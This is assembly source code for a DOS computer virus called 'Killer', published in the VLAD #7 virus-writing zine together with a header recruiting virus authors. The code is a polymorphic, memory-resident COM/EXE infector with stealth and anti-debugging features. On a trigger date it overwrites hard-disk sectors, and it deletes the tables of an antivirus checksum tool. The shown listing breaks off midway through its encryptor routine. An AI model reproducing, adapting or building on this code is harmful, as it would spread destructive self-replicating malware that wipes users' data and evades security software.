Virus Labs & Distribution
VLAD #7 - Killer Virus


; For VLAD#7.
; STEALTH group WorldWide seeking WorldWide contacts with virmakers and
; virus supporters.
; For contact with SGWW drop us a line to:
;     E-Mail:  kirill@accessnet.ru
;              caesar@sch157.freenet.kiev.ua
;              
;     Mail:    SGMoscoW,  Box 15, MoscoW 125080 RUSSIA
;     Mail:    SGUkraine, Box 10, Kiev   252148 UKRAINE
;----------------------------------------------------------------------------
; 						     TO WHOM IT MAY CONCERN.
;						     様様様様様様様様様様様
;				-= KILLER =-
;				陳陳陳陳陳陳
; ---------------------------------------------------------------------------
; This virus includes the EMME (Eternal Maverick Multilevel Encryptor) v3.0.
; ---------------------------------------------------------------------------
; Polymorphic ( from 1 up to 4 levels of encryption ) resident COM, EXE & OV?
; infector.  Does not decrease memory size and is not detectable by heuristic
; analysis (like WEB,F-PROT & TBAV),  does not destroy overlay EXE, does not
; conflict  with  CHKDSK  and  TSRs,  can't  be  cured  with  TBCLEAN,  many
; resident virus traps  ( like ANTIAPE.SYS )  are  not  able to intercept its
; attempt  to stay  resident  ( if it is possible use  UMB,  if not wait for
; program termination  and  then  allocate  about 2700 bytes in low memory ).
; It uses an original technique to find DOS INT 21h handler. It is a Stealth.
; Uses anti-debugging tricks, disables stealth when archivators are executed.
; It destroys Adinf tables when executed first time.     DESTRUCTIVE !
; Assembled with TASM 3.1 (tasm /z/m2 newkiller.asm), TASM 4.0 fails & sucks.
;
; 				   (c) Eternal Maverick 1996.  Stealth Group.
;     浜様様様様様様様様様
;             YES,       	   Special  thanks  to Populizer  for help
;        IT WORKS WITH   	   in bug-fixing & Dark Angel  for his UMB
;      MICROSOFT WINDOWS 	   residency.
;     藩様様様様様様様様様	   
;				   Congratulations to all virmakers.
;
; All trade marks are properties of their respective owners.
; ----------------------------------------------------------------------------
; 	LOOK OUT WHEN RUN ! 	KILL THEM ALL, LET THE GOD SORT THEM OUT!
; ----------------------------------------------------------------------------
; Compile with TASM /m2
; ----------------------------------------------------------------------------
; 	P.S. Guys, sorry for ill comments! Nevertheless it's interesting!
; ----------------------------------------------------------------------------
	.model tiny
	.code
	org 100h
START:
;-------------------------------------------------------------------
VL	 EQU 	OFFSET VIREND - START		; A length of pure virus code
INT24h	 EQU	OFFSET ERRORINT - START + 10h	; Int24h handler offset in
						; memory block
INT_NEW	 EQU	OFFSET MAININT - START + 10h	; Offset of Int21h

; P.S. First 10h bytes of virus memory block are used for data storing
 
BACKDOOR EQU	OFFSET INSTALL - INSTALLED	; Used during installation

CALL21h  EQU	OFFSET NO_RET_2 - START + 10h + 1  ; Places for old int21h
CALLDOS  EQU	OFFSET NO_RET_1 - START + 10h	   ; & original int21h storing

RES_INST EQU	OFFSET PATTERN - START + 10h
RETURN	 EQU	OFFSET FAIL - START + 11h
INT22H	 EQU	OFFSET EXIT_INT - START + 10h
BYTES	 EQU	VL + 10h
NEWBYTES EQU	BYTES + 1Ch
;-----------------------------------------
;	Another data area
;-----------------------------------------
SAVE_AX  EQU	NEWBYTES+18h
_HIGH_	 EQU	SAVE_AX + 2
_LOW_	 EQU	_HIGH_ + 2
NO_HIGH	 EQU	_LOW_ + 2
NO_LOW	 EQU	NO_HIGH + 2
LNEW	 EQU	NO_LOW + 2
HNEW	 EQU	LNEW + 2
;-----------------------------------------
VIDEO	 EQU	0BE00h			; Segment of video memory
					; used for encryption
;--------------------------------------------------------------------
	PUSH ES
	CALL DEBUG
INSTALLED:
	ADD  SI,OFFSET VIREND - INSTALLED
	POP  DX
	XOR  AX,AX
	MOV  BX,AX
	MOV  ES,DX
	MOV  DS,DX
	MOV  CX,SS			; Check if it is EXE or COM
	CMP  CX,DX			; by comparing SS and DS. It
	JNE  _EXE_			; OK, because this virus resets
					; stack in EXE files

;----------------------------------------
;	Restoring of COM
;----------------------------------------
	MOV  DI,0100h
	PUSH DI
	MOV  CX,0Ch
	REP  MOVSW
	RET
_EXE_:
;----------------------------------------
;	Restoring of EXE
;----------------------------------------
	ADD  DX,10h
	MOV  CX,DX
	CLI
	ADD  CX,WORD PTR CS:[SI+0Eh]
	MOV  SS,CX
	MOV  SP,WORD PTR CS:[SI+10h]
	STI
	ADD  DX,WORD PTR CS:[SI+16h]
	PUSH DX
	PUSH WORD PTR CS:[SI+14h]
	RETF
INSTALL:
;--------------------------------------
;	Try to climb to UMB
;	Thanks to Dark Angel
;--------------------------------------
	SUB  SI,OFFSET INSTALL-START
	PUSH ES
	PUSH SI

	XOR  DI,DI
	MOV  AX,3306h		; get true DOS version
	INT  21h
	INC  AL			; DOS 4-?
	JZ   NO_UMBs		; if so, we don't have UMB's

	MOV  AH,52h		; get DOS master list
	INT  21h

	LDS  SI,ES:[BX+12h]	; get ptr to disk buffer info

	MOV  AX,DS:[SI+1Fh]	; get address of the first UMB
	INC  AX			; (FFFF if no UMBs present)
	JZ   NO_UMBs
        DEC  AX			; undo damage from above

SEARCH_CHAIN:

	MOV  DS,AX		; go to the MCB
	CMP  WORD PTR [DI+1],DI ; unused?
	JNZ  SEARCH_NEXT
	CMP  WORD PTR [DI+3],(VL/16)+10  ; MCB large enough to
	JA   HANDLE_MCB			 ; hold us and our MCB?

SEARCH_NEXT:
	CMP  BYTE PTR [DI],'Z'	; end of chain?
	JZ   NO_UMBs
	MOV  BX,[DI+3]		; go to the next MCB
	INC  AX
	ADD  AX,BX
	JMP  SHORT SEARCH_CHAIN

HANDLE_MCB:
	SUB  WORD PTR [DI+3],(VL/16)+11  ; adjust size of memory
					; area for virus + its MCB
	MOV  BX,[DI+3]			; get size of new memory area
	MOV  CL,'M'			; make sure this MCB doesn't
	XCHG CL,BYTE PTR [DI]		; mark the end of the chain
	INC  AX
	ADD  AX,BX			; go to virus segment's MCB
	MOV  DS,AX
	MOV  ES,AX

	MOV  BYTE PTR [DI],CL		; patch end of chain indicator
	MOV  WORD PTR [DI+1],70h	; mark MCB owned by DOS
	MOV  WORD PTR [DI+3],(VL/16)+10 ; patch in virus size

	INC  AX				; ds->virus segment
	MOV  DS,AX

	MOV  DI,8			; go to program name field
	MOV  AX,'CS'			; make virus invisible to MEM
	STOSW				; by pretending it is
	XOR  AX,AX			; DOS system code
	STOSW
	STOSW
	STOSW
;--------------------------------------
;	Move my virus up!
;--------------------------------------
	POP  SI
	POP  ES
	PUSH DS
	POP  ES
	CALL REMOVE
	JMP  SHORT TRACE
NO_UMBs:
	POP  SI
	POP  ES
;--------------------------------------
	MOV  BX,WORD PTR ES:[2]
	SUB  BX,(VL/16)+10
	PUSH ES
	MOV  ES,BX
	CALL REMOVE			; Move virus up
					; without MCB change
;--------------------------------------
	POP  DS
	MOV  SI,0Ah
	MOV  DI,RETURN
	MOVSW
	MOVSW
	MOV  WORD PTR DS:[SI-2],ES	; Set Int22h in PSP
	MOV  WORD PTR DS:[SI-4],INT22h	; to virus int22h handler
TRACE:
;--------------------------------------
;	Save int 21h
;--------------------------------------
	PUSH ES
	mov  ax,3521h
	int  21h
	pop  ds
	push ds
	mov  ds:[call21h+1],bx
	mov  ds:[call21h+3],es
;-----------------------------------------
;     Searching for original int 21h 
;-----------------------------------------
; This technique is derived from  DIR_II
; virus. Works with all DOS versions from
; MS DOS 3.0 to PC DOS 7.0
;----------------------------------------- 
	MOV  AH,52h
	INT  21h
	MOV  SI,ES:[BX+4]
	LDS  SI,ES:[SI-4]
FIND21:
	DEC  SI
	CMP  WORD PTR DS:[SI],0E18Ah
	JNE  FIND21
	CMP  BYTE PTR DS:[SI+2],0EBh
	JNE  FIND21
FINDYOU:
	LODSB
	CMP  AL,77h
	JNE  FINDYOU
	SUB  SI,4
	MOV  AX,DS
	POP  DS
	MOV  WORD PTR DS:[CALLDOS+1],SI
	MOV  WORD PTR DS:[CALLDOS+3],AX
SET21h:
	MOV  DX,INT_NEW
	MOV  AX,2521h
	INT  21h
	POP  SI
	JMP  SI		; Installation complete.

;-----------------
; int 22h handler
;-----------------
EXIT_INT:
	MOV  AH,48h
	MOV  BX,(VL/16)+7
	INT  21h	; Get a memory block
	JC   FAIL
	DEC  AX
	MOV  ES,AX
	XOR  SI,SI
	MOV  WORD PTR ES:[SI+1],070h	; Make in invisible for many progs
					; Set environment mark 70h
	CALL REMOVE			; Move virus in new place
	INC  AX
	MOV  DS,AX
	CALL SET21h			; Set Int21h
FAIL:
DB	0EAh,0,0,0,0			; Return to DOS

;-----------------
; int 24h handler
;-----------------
ERRORINT:
	MOV  AL,3	; AL = 3 (abort current proccess)
	IRET
READER:
;------------------------------
; Int 21h function 3Fh handler
; Needed for stealth
;------------------------------
	CALL OURFILE
	CALL INT_21h
	JC   GOGO_1

	PUSHF
	PUSH CX
	PUSH BX
 	PUSH SI
	PUSH DI
	PUSH ES
	PUSH DX
	PUSH DS

	PUSH CS
	POP  DS
	MOV  DS:[SAVE_AX],AX

	MOV  AL,01h
	CALL SEEK_X
	JC   GOGO

	MOV  DS:[HNEW],DX
	MOV  DS:[LNEW],AX

	SUB  AX,WORD PTR DS:[SAVE_AX]
	SBB  DX,0

	MOV  DS:[_HIGH_],DX
	MOV  DS:[_LOW_],AX

	CALL SEEK_E

	SUB  AX,0E00h
	SBB  DX,0

	MOV  DS:[NO_HIGH],DX
	MOV  DS:[NO_LOW],AX

	CMP  WORD PTR DS:[_HIGH_],0
	JNE  MID
	CMP  WORD PTR DS:[_LOW_],18h
	JAE  MID
BEG:
	CALL READ_L
	MOV  CX,18h
	SUB  CX,DS:[_LOW_]

	CMP  CX,DS:[SAVE_AX]
	JB   OK
	MOV  CX,DS:[SAVE_AX]
OK:
	ADD  SI,DS:[_LOW_]
	POP  ES
	POP  DI
	PUSH DI
	PUSH ES
	REP  MOVSB

	CALL S_INIT
	JC   GOGO
READ_OK:
	CALL SEEK_Z
GOGO:
	MOV  AX,DS:[SAVE_AX]
NO_AX:
	POP  DS
	POP  DX
	POP  ES
	POP  DI
	POP  SI
	POP  BX
	POP  CX
	POPF
GOGO_1:
	RETF 2
MID:
	CALL S_INIT
	JNC   READ_OK

	CALL SEEK_Z

	MOV  CX,DS:[_HIGH_]
	MOV  DX,DS:[_LOW_]

	CALL RCOMP
	JC   NO_AX

	MOV  AX,DS:[NO_HIGH]
	SUB  AX,DS:[_HIGH_]
	MOV  BL,10h
	MUL  BL
	ADD  AX,DS:[NO_LOW]
	SUB  AX,DS:[_LOW_]
	JMP  SHORT NO_AX

;栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩
;	int  21h  handler
;栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩
MAININT:
;---------------------
;    Anti-tracing
;---------------------
	PUSH AX
	PUSH SS
	POP  SS
	PUSHF			; This instruction can not be traced.
	POP  AX
	TEST AH,1		; Tracing of our int 21h handle?
	POP  AX
	JNZ  NO_CLOSE		; Go away!
;---------------------

	CMP  AX,06CFFh		; Are you there?
	JNE  MORE

	MOV  AL,04Bh		; Here I am, boss!
	IRET
MORE:
	CMP  AH,3Ch
	JE   MAKE_IT
	CMP  AH,5Bh
	JNE  MORE_1
MAKE_IT:
	CALL INT_21h
	JC   CR_ERROR
	MOV  WORD PTR CS:[0Eh],AX
CR_ERROR:
	RETF 2
MORE_1:
	CMP  AH,03Eh
	JNE  REGI

	CMP  BX,WORD PTR CS:[0Eh]
	JNE  MORE_3

	CMP  BX,5		; Tis not looks like a file!
	JB   NO_CLOSE

	MOV  WORD PTR CS:[06h],BX

	PUSH DS
	PUSH BX
	CALL READ_L
	JNE  MORE_2
	CALL TALE_OUT
MORE_2:
	MOV  AH,3Eh
	POP  BX
	POP  DS
	MOV  WORD PTR CS:[0Eh],0
	JMP  SHORT NO_CLOSE
MORE_3:
	CMP  BX,WORD PTR CS:[04h]
	JNE  _EXIT_
	MOV  WORD PTR CS:[04h],0
NO_CLOSE:
	JMP  SHORT _EXIT_
REGI:
	CMP  AH,04Bh
	JNE  NOT_EXEC

	OR   AL,AL
	JZ   COME
FAG:
	MOV  BYTE PTR CS:[08h],0FFh
COME:
	JMP  CHECK
NOT_EXEC:
	CMP  BYTE PTR CS:[09h],0FFh
	JE   _EXIT_

	CMP  AX,4300h
	JE   COME
	CMP  AH,056h
	JE   COME
	CMP  AH,03Dh
	JE   COME

	CMP  AX,4202h
	JNE  NOT_LSEEK

	CALL OURFILE

	PUSH BX
	PUSH CX
	PUSH DX
	CALL SEEK_X

	SUB  AX,0E00h
	SBB  DX,0

	XCHG CX,AX
	XCHG CX,DX
	POP  AX
	ADD  DX,AX
	POP  AX
	ADC  CX,AX
	MOV  AX,4200h
	POP  BX
_EXIT_:
	JMP  SHORT GATE

NOT_LSEEK:
	CMP  AH,03Fh
	JNE  AHEAD
	JMP  READER
AHEAD: 
	CMP  AH,4Eh
	JE   HIDE_1
	CMP  AH,4Fh
	JE   HIDE_1
	CMP  AH,11h
	JE   HIDE_2
	CMP  AH,12h
	JE   HIDE_2
	CMP  AH,40h
	JNE  GATE
WRITER:
	CALL OURFILE

	PUSH AX
	PUSH BX
	PUSH SI
	PUSH DS
	PUSH DX
	PUSH CX

	MOV  AL,01h
	CALL SEEK_X
	PUSH AX
	PUSH DX
	
	CALL READ_L
	JNE  NOT_OUR
	CALL WRITE_L
NOT_OUR:
	POP  CX
	POP  DX
	XOR  AL,AL
	CALL SEEK_Z

	POP  CX
	POP  DX
	POP  DS
	POP  SI
	POP  BX
	POP  AX
GATE:
	JMP  NO_RET_2
HIDE_1:
;-------------------------------------
; Subtracting of VIRUS length
; while 4Eh,4Fh,11h,12h functions
; are called.
;-------------------------------------
	PUSH DI
	CALL PREFIX
	JC   ERROR
	CMP  BYTE PTR ES:[BX+16h],0Fh
	JNE  ERROR
	MOV  DI,1Ah
	JMP  SHORT SUBLEN
HIDE_2:
	PUSH DI
	CALL PREFIX
	POP  AX
	TEST AL,0FFh
	PUSH AX
	JNZ  ERROR
	CMP  BYTE PTR ES:[BX],0FFh	; Extended FCB - ?
	JNE  SIMPLE
	ADD  BX,7
SIMPLE:
	CMP  BYTE PTR ES:[BX+17h],0Fh
	JNE  ERROR
	MOV  DI,1Dh
SUBLEN:
	SUB  WORD PTR ES:[BX+DI],0E00h
	SBB  WORD PTR ES:[BX+DI+2],0
	JNC  ERROR
	ADD  WORD PTR ES:[BX+DI],0E00h
	ADC  WORD PTR ES:[BX+DI+2],0
ERROR:
	POP  AX
	POPF
	POP  ES
	POP  DI
	RETF 2
CHECK:
;---------------------------------------
;       Check if it is a proper file
;	for infection
;---------------------------------------
	PUSH BP
	PUSH SI
	PUSH DI
	PUSH ES
	PUSH BX
	PUSH CX
	PUSH AX
	PUSH DX
	PUSH DS

	MOV  DI,DX
	MOV  SI,DX
	PUSH DS
	POP  ES
	MOV  AX,1211h
	INT  2Fh		; Converts ASCIIZ line into UpCase letters
	PUSH CS
	POP  DS
	MOV  BYTE PTR DS:[09h],0
	CLD
	MOV  CX,4
	SUB  DI,CX
	MOV  SI,OFFSET EXTEN - START + 10h
	CALL STR1	; Check file extention.
	JZ   _ESC
EXITEXT:
	SUB  DI,12	; Max Length of file name + '.' + extention
	CMP  CL,4
	JE   CHKCOM
	CMP  CL,3
	JNE  TEST_OK
CHKEXE:
	CMP  BYTE PTR ES:[DI+7],'F'		; Adin'F' - ?
	JE   _ARC				; Turn stealth off.
	MOV  SI,OFFSET ANTIV - START + 10h
	CALL CHKNAME
	JNZ  _ESC

	MOV  SI,OFFSET ARCHV - START + 10h
	CALL CHKNAME				; Check if it is archivator
						; or not
	JNZ  _ARC

	JMP  SHORT CHKALL	
CHKCOM:
	MOV  SI,OFFSET DONOT - START + 10h	; Checking for COMMAND.COM
						; & WIN.COM
	MOV  AL,2
	CALL CHK1
	JNZ  _ESC
CHKALL:
	MOV  SI,OFFSET ALL - START + 10h	; Check for CHKDSK. This shit
						; is sometimes COM and sometimes
						; EXE file
	MOV  AL,1
	CALL CHK1
	JZ   TEST_OK
_ARC:
	OR   BYTE PTR DS:[09h],0FFh		; Disable stealth
_ESC:
	JMP  ABORT				; No other actions.
TEST_OK:
	MOV  AX,352Ah
	CALL INT_21h
	MOV  BYTE PTR ES:[BX],0CFh	; Specialy for AVPTSR & Co
					; Turn Int 2Ah off
;---------------------------------------
;	Save & set INT 24h
;---------------------------------------
	MOV  AX,3524h
	CALL INT_21h

	MOV  WORD PTR DS:[0],BX
	MOV  WORD PTR DS:[2],ES

	MOV  AX,2524h
	MOV  DX,INT24h
	CALL INT_21h

;---------------------------------------
; Disable IRQ-1 (Int 09h)
; It's better than to deal
; with function 33h of INT 21h
;---------------------------------------
; Recommended for nervous users!!! ;-)
;---------------------------------------

	IN   AL,21h
	OR   AL,00000010b
	OUT  21h,AL
;----------------------------------------
	POP  DS
	POP  DX
	PUSH DX
	PUSH DS
	MOV  AX,4300h
	CALL INT_21h

	PUSH CX

	TEST CL,00000100b	; System file - ?
	JNZ  PROTECT		; Don't touch it!!!

;----------------------------------------
;	Checking for protected floppy
;	using 3F5h port
;----------------------------------------
	PUSH DX
	MOV  CX,400h
	MOV  DX,3F5h
	MOV  AL,4
	OUT  DX,AL
WAIT_1:
	LOOP WAIT_1

	MOV  CX,400h
	OUT  DX,AL
WAIT_2:
	LOOP WAIT_2

	IN   AL,DX
	TEST AL,40h		; Protected disk - ?
	POP  DX
	JNZ  PROTECT
;----------------------------------
	POP  CX
	PUSH CX
	AND  CL,0FEh		; Set READ-ONLY off
	MOV  AX,4301H
	CALL INT_21h
	JNC  _FILE_OK
;-----------------------------------
; I am not able to change attribute
;-----------------------------------
PROTECT:
	POP  CX
	JMP  ESC_2
_FILE_OK:
	PUSH DX
	PUSH DS
	MOV  AX,3D02h
	CALL INT_21h		; DOS Services  ah=function 3Dh
				; open file, al=mode,name@ds:dx
	MOV  WORD PTR CS:[06h],AX
	MOV  AX,5700h
	CALL FILE_X		; DOS Services  ah=function 57h
				; get/set file date & time
	PUSH DX
	PUSH CX

	CMP  BYTE PTR CS:[08h],0FFh
	JNE  TEST_2

	CMP  CL,0Fh		; Infected file?
	JNE  ESC_0
TAKE_IT:			; To cure a file
	CALL READ_L
	JNE  ESC_0
	CALL WRITE_L

	POP  CX
	AND  CL,11100000b
	PUSH CX
ESC_0:
	JMP  ESC_1
TEST_2:
	CMP  CL,0Fh		; Is it already infected?
	JE   ESC_0

	PUSH CS
	POP  DS
	MOV  DX,BYTES
	CALL READ_H		; DOS Services  ah=function 3Fh
				; read file, cx=bytes, to ds:dx
	CALL SEEK_E

	CMP  AX,0E00h		; File too small to be infected - ?
	JBE  ESC_0

	MOV  SI,BYTES
	CMP  WORD PTR DS:[SI],5A4Dh	; 'MZ'
	JE   EXE_FILE
	CMP  WORD PTR DS:[SI],4D5Ah	; 'ZM'
	JE   EXE_FILE

	CMP  AX,0F000h		; File too big to be infected - ?
	JAE  ESC_0

	ADD  AX,100h
	MOV  WORD PTR DS:[NEWBYTES+14h],AX	; IMPORTANT. This is used
						; for encrypting.

	PUSH AX
	CALL MODUL

;-------------------------------------------
;	To create a polymorphic "jump"
;-------------------------------------------
	PUSH DS
	POP  ES
	MOV  DI,NEWBYTES
	MOV  BP,10h	; Don't change SP in encryptor
	CALL MAKE

	IN   AL,40h
	AND  AL,00000011b
	MOV  AH,AL

	ADD  AX,0E0B8h
	STOSB
	POP  WORD PTR DS:[DI]
	INC  DI
	INC  DI
	MOV  AL,0FFh
	STOSW

	NEG  DX
	ADD  DX,13h
	CALL POLY
;-------------------------------------------	
	JMP  SHORT WRITE
EXE_FILE:
;---------------------------------------
;	Is it segmented or not ?
;---------------------------------------
	PUSH DX
	PUSH AX
	MOV  SI,200h
	DIV  SI
	DEC  AX
	CMP  AX,WORD PTR DS:[BYTES+04h]
	POP  AX
	POP  DX
	JA   ESC_1
;-------------------------------------------
	MOV  SI,BYTES
	MOV  DI,NEWBYTES

	PUSH DS
	POP  ES
	MOV  CX,0Ch
	REP  MOVSW
	MOV  CX,10h
	DIV  CX

	SUB  AX,WORD PTR DS:[SI+08h+4]
	MOV  WORD PTR DS:[SI+16h+4],AX  ; ReloCS
	MOV  WORD PTR DS:[SI+14h+4],DX  ; ExeIP
;-----------------------------------------------
;	Reseting STACK
;-----------------------------------------------
	ADD  AX,0E0h
	MOV  WORD PTR DS:[SI+0Eh+4],AX  ; ReloSS
	ADD  DX,200h
	AND  DL,NOT 1			; To avoid an odd stack
	MOV  WORD PTR DS:[SI+10h+4],DX  ; ReloSP
;-----------------------------------------------
	ADD  WORD PTR DS:[SI+04h+4],07h ; FileSize

	CALL MODUL			; Creats an encrypted modul
					; & writes it to a file
WRITE:
	MOV  DX,NEWBYTES
	CALL WRITE_H			; Write first 18h bytes
MARKER:
	POP  CX
	MOV  CL,0Fh			; Set time to mark infection
	PUSH CX
ESC_1:
	POP  CX
	POP  DX
	MOV  AX,5701h
	CALL FILE_X		; DOS Services  ah=function 57h
				; get/set file date & time
	MOV  AH,3Eh
	CALL FILE_X		; DOS Services  ah=function 3Eh
				; close file, bx=file handle
	POP  DS
	POP  DX
	POP  CX
	MOV  AX,4301h
	CALL INT_21h		; DOS Services  ah=function 43h
				; get/set file attrb, nam@ds:dx
ESC_2:
;-----------------------------
; 	Restore int 24h
;-----------------------------
	LDS  DX,DWORD PTR CS:[0]
	MOV  AX,2524h
	CALL INT_21h
;-----------------------------
;	Enable IRQ-1
;-----------------------------
	IN   AL,21h
	AND  AL,NOT 2
	OUT  21h,AL
;-----------------------------
	POP  DS
	POP  DX
	POP  AX

	MOV  BYTE PTR CS:[08h],0

	CMP  AH,03Dh
;-----------------------------
;	Check for file open
;	Needed for stealth
;-----------------------------
	JNE  GO_AHEAD

	CALL INT_21h
	JC   GO_Fail_1

	MOV  WORD PTR CS:[06h],AX
	PUSH DX
	PUSH DS
	PUSH AX
	CALL READ_L
	JNE  GO_Fail

	POP  AX
	MOV  WORD PTR CS:[04h],AX
	PUSH AX
GO_Fail:
	CALL SEEK_H
	POP  AX
	POP  DS
	POP  DX
GO_Fail_1:
	POP  CX
	POP  BX
	POP  ES
	POP  DI
	POP  SI
	POP  BP
	RETF 2
ABORT:
	POP  DS
	POP  DX
	POP  AX
GO_AHEAD:
	POP  CX
	POP  BX
	POP  ES
	POP  DI
	POP  SI
	POP  BP
	JMP  SHORT NO_RET_2
READ_H:
	MOV  CX,18h
READ_X:
	MOV  AH,3Fh
	JMP  SHORT FILE_X
WRITE_H:
	MOV  CX,18h
WRITE_X:
	MOV  AH,40h
	JMP  SHORT FILE_X
SEEK_H:
	XOR  AL,AL
	JMP  SHORT SEEK_X
SEEK_E:
	MOV  AL,02
SEEK_X:
	XOR  DX,DX
SEEK_Y:
	XOR  CX,CX
SEEK_Z:
	MOV  AH,42h
FILE_X:
	MOV  BX,WORD PTR CS:[06h]

INT_21h PROC NEAR
	PUSHF
	PUSH CS
	CALL NO_RET_1
	RET
NO_RET_1:
	DB   0EAh,00h,00h,00h,00h	; DOS int 21h

OURFILE PROC NEAR
	CMP  BX,WORD PTR CS:[04h]
	JNE  AWAY
	MOV  WORD PTR CS:[06h],BX
	RET
AWAY:
	ADD  SP,2
OURFILE ENDP

NO_RET_2:
	CLI
	DB   0EAh,00h,00h,00h,00h	; OLD int 21h
INT_21h ENDP

PREFIX  PROC NEAR
	POP  DI
	PUSH ES
	CALL INT_21h
	PUSHF
	PUSH AX
	MOV  AH,2Fh
	CALL INT_21h
	JMP  DI
PREFIX  ENDP

DEBUG   PROC NEAR
;--------------------
;	Surprise!
;	Guess who?
;--------------------
	mov  ah,2ah
	int  21h
	inc  al
	shl  al,1
	cmp  dl,al
	jnz  lucky

	mov  ah,13h
	int  2fh
	push ds
	push dx
	mov  ah,13h
	int  2fh
	pop  dx
	pop  ds
	mov  ax,2513h
	int  21h

	mov  cx,0001h
	mov  dx,0580h
destroy:
	mov  ax,0308h
	int  13h	; Cruel, isn't it?
	jc   _more
	dec  dh
	jns  destroy
	mov  dh,05h
	inc  ch
	cmp  cx,10h
	jb   destroy
_more:
	inc  dx
	cmp  dl,81h
	jbe  destroy
	int  19h	
lucky:
;--------------------------------------------
;   ANTI-DEBUG TRICK (an old & stupid one)
;--------------------------------------------
	IN   AL,21H
	PUSH AX
	MOV  AL,0FFh	; Disable all IRQ
	OUT  21H,AL
	POP  AX
	OUT  21H,AL
;---------------------------------------------
;   ANTI-DISASSEMBLER TRICK
;---------------------------------------------
	MOV  CX,09EBh
	MOV  AX,02D2Dh
	JMP  $-2
	ADD  AX,02AFFh
	JMP  $-10
	INT  21h
;----------------------------------------------
	POP  SI
	SUB  AL,04Bh	; Am I here?
	JNZ  TABLES	; Cirtainly, I am.
	JMP  SI		; No installation necessary
TABLES:
;------------------------------------
;	Adinf tables to kill!
;------------------------------------
; P.S.  Adinf - a nasty bitch, which
;       creates checksum tables on
;	every hard disk drive.
;------------------------------------
;	To correct a return adress
;------------------------------------
	PUSH SI
	ADD  SI,BACKDOOR
	PUSH SI
;------------------------------------
	call DelTab
mask1   db	'c:\*.*',0
DelTab:
	pop  dx
	push cs
	pop  ds
	mov  di,dx
	mov  byte ptr ds:[di],'c'
NextDisk:
	push ds
	push dx
	mov  cx,07
	mov  ah,4eh
	int  21h
	jc   NotFound
NextKill:
	mov  ah,2fh
	int  21h
	pop  di
	mov  ax,ds:[di]
	push di
	push es
	pop  ds
	mov  dl,byte ptr ds:[bx+1Eh+06]
	or   dl,20h
	cmp  dl,al
	jne  NextFile
	mov  word ptr ds:[bx+1bh],ax
	mov  byte ptr ds:[bx+1dh],'\'
	lea  dx,[bx+1bh]
	xor  cx,cx
	mov  ax,4301h
	int  21h
	mov  cl,07
	mov  ah,3ch
	int  21h
NextFile:
	pop  dx
	pop  ds
	push ds
	push dx
	mov  ah,4fh
	int  21h
	jnc  NextKill
NotFound:
	pop  dx
	pop  ds
	mov  di,dx
	inc  byte ptr ds:[di]
	cmp  al,12h
	je   NextDisk
;-----------------------------
	RET
DEBUG	ENDP
 
MODUL   PROC NEAR
;---------------------------------
;	The most difficult
;	procedure. No comments!
;---------------------------------
	MOV  DI,VIDEO
	MOV  ES,DI
	MOV  SI,10h
	XOR  DI,DI
	IN   AX,40h

	TEST AL,4
	JZ   NEXT_LEVEL

	PUSH SI
	MOV  SI,OFFSET INTINST - 100h + 10h
	MOV  WORD PTR DS:[SI+1],AX
	MOV  CX,OFFSET GRID-INTINST
	REP  MOVSB
	MOV  CX,(3584-28)/2
	POP  SI
INTERNAL:
	MOVSW
	XOR  WORD PTR ES:[DI-2],AX
	LOOP INTERNAL

	CALL NEW_SEG

NEXT_LEVEL:
	TEST AL,1
	JZ   LAST_LEVEL

	PUSH SI
	PUSH DS
	MOV  SI,OFFSET FICTION - 100h + 10h
	PUSH CS
	POP  DS
	MOV  CX,OFFSET ANTIWEB - FICTION
	REP  MOVSB
	MOV  CX,(3584-28)/4
	POP  DS
	POP  SI
MIX:
	LODSW
	STOSW
	MOVSW
	XOR  WORD PTR ES:[DI-2],AX
	LOOP MIX

	CALL NEW_SEG

LAST_LEVEL:
	TEST AL,2
	JZ   POLY_LEVEL

	PUSH SI
	PUSH DS
	MOV  SI,OFFSET GRID - 100h + 10h
	PUSH CS
	POP  DS
	MOV  WORD PTR DS:[SI+1],AX
	MOV  CX,OFFSET FICTION - GRID
	REP  MOVSB
	MOV  CX,(3584-28)/3
	POP  DS
	POP  SI
PITHOLE:
	MOVSW
	ADD  WORD PTR ES:[DI-2],AX
	MOVSB
	LOOP PITHOLE

	CALL NEW_SEG

;----------------------------------------------------------------
;	Creating of polymorphic level.
;	PARAMETERS:
;	ES - points to buffer of proper size.
;	DS - points to segment of code to be encrypted.
;	SI - an offset of PATTERN.
;
;	When finished:
;	S:0 - crypted code.
;	DI - its size in bytes.
;-----------------------------------------------------------------------------
;	A structure of encryptor:
;       -------------------------
;
;	mov	reg1,offcode	; offcode - offset of crypted code
;	mov	reg2,-vl	; vl - it's length
;	mov	reg3,code_1
;Decode:
;	oper1	word ptr ds:[reg1],reg3
;	inc	reg1
;	inc	reg1
;	oper2	reg3,code_2
;	inc	reg2
;	jnz	Decode
;
;	--------------------------------
;
;	reg1	    - SI,DI,BX or BP
;	reg2,reg3   - AX,BX,CX,DX,BP,SI or DI
;	oper1       - XOR,ADD or SUB
;	oper2	    - ADD or SUB
;
;	All registers unused in decryptors are used in garbage instructions.
;-----------------------------------------------------------------------------
POLY_LEVEL:
	IN   AL,40h
	OR   AL,AL
	JZ   POLY_LEVEL

	PUSH SI
	PUSH DS
	PUSH CS
	POP  DS	
;---------------------------------------------------------
;	Random function of 21h call generating.
;---------------------------------------------------------
	XOR  DI,DI
	MOV  SI,OFFSET ANTIWEB-START+10h
	MOV  BYTE PTR DS:[SI+1],AL
	IN   AL,40h
	AND  AL,0Fh
	ADD  AL,0E0h
	MOV  BYTE PTR DS:[SI+3],AL

;---------------------------------------------------------
;	Antiheuristic patch creating
;---------------------------------------------------------
	MOV  BP,10h+1	; Don't change SP and AX in decryptor
	MOV  CX,06h
ANTI:
	CMP  CL,2
	JNE  NO_GLUE
	MOV  AL,74h
	STOSB
	PUSH DI
	INC  DI
NO_GLUE:
	CALL MAKE
	MOVSW
	LOOP ANTI

	POP  BX
	MOV  AX,DI
	SUB  AX,BX
	DEC  AX
	DEC  AX
	DEC  AX
	MOV  BYTE PTR ES:[BX],AL	; BYTE FOR JE

;----------------------------------------------------------
;	Creating a decryptor
;----------------------------------------------------------

	SUB  BP,1	; To free AX
	CALL MAKE

;---------------------------------------------
;	First instruction 
;---------------------------------------------
instr1:
	CALL ZEROTWO

	MOV  AL,BYTE PTR DS:[BX+OFFSET PACK_1-START+10h]
	STOSB
	PUSH DI		; Needed for decryptor
	STOSW		; To reserve a place for offset
	MOV  AL,BYTE PTR DS:[BX+3+OFFSET PACK_1-START+10h]
